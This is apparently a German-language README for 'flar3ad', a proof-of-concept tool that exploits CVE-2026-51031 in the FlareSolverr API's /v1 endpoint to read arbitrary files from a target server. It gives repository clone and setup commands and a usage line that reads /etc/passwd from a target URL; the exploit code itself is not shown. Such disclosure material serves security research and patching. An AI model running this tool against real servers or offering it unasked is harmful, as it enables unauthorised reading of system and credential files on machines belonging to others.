
PoC für CVE-2026-51031 zum beliebigen Lesen lokaler Dateien
flar3ad ist ein Tool, das die CVE-2026-51031 ausnutzt, um Dateien von einem Zielserver zu lesen, indem es den /v1-Endpunkt der FlareSolverr-API und die Funktion driver.get() verwendet, um die Schwachstelle auszunutzen. Weitere Informationen in xinyis Blog.
git clone https://github.com/daemoncibsec/flar3ad.git
cd flar3ad
python3 -m venv venv
source venv/bin/activate
pip install rich
pip install argparse
pip install requests
chmod +x flar3ad
Um die venv zu verlassen:
deactivate
Lies die Datei /etc/passwd des Zielservers.
./flar3ad http://localhost:8191/ /etc/passwd